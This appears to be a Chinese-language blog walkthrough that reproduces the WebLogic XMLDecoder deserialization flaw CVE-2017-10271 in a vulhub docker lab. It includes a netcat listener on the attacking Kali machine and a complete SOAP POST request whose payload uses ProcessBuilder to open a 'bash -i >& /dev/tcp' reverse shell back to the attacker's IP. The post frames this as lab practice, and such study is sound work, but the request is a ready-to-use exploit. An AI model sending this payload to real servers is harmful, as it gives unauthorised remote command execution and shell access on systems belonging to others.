(CVE-2017-10271)weblogic XMLDecoder反序列化漏洞复现过程

搭建环境
ubuntu 16.04 weblogic所在的环境
kali2020 攻击机

前言

https://www.anquanke.com/post/id/92003 漏洞原理(代码分析)

首先ubuntu中要有docker,用docker部署环境会省很多时间

apt-get install docker*
service start docker

安装git

apt-get install git

docker -v可以看docker有没有安装成功
创建或者修改/etc/docker/daemon.json文件

{
“registry-mirrors”: [“https://cr.console.aliyun.com”]
}

下载vulhub靶场,这里面包含很多cve漏洞,对一些研究漏洞小伙伴来说算是福音了
放在方便找到的文件夹下,否则就是在当前的目录下下载

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

在这里插入图片描述在weblogic目录下,cve-2017-10271
在这里插入图片描述
在这里插入图片描述
可以用cat README.md查看复现过程
在这里插入图片描述docker常用命令

docker ps 查看运行中的容器
在这里插入图片描述

docker start 容器名字 启动容器
docker stop 容器名字 暂停容器
docker exec -it 容器ID /bin/bash 进入容器内部

docker compose up -d搭建环境
访问ubuntu的ip地址+7001端口,有下面这个页面说明搭建成功
在这里插入图片描述

复现过程

访问http://10.92.1.126:7001/wls-wsat/CoordinatorPortType11,如下图说明存在漏洞
在这里插入图片描述在kali上开启端口监听

nc -l -p 21

构造发送的post数据包,注意payload部分需要html编码,README.md文件中也有提到

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/接收shell的ip/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述
发送成功后就反弹到shell了
在这里插入图片描述

如果还有不懂的地方可以关注我的公众号“沉淀Hack”,发消息向我留言,每天会更新大量干货教程,快扫下面的二维码吧
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值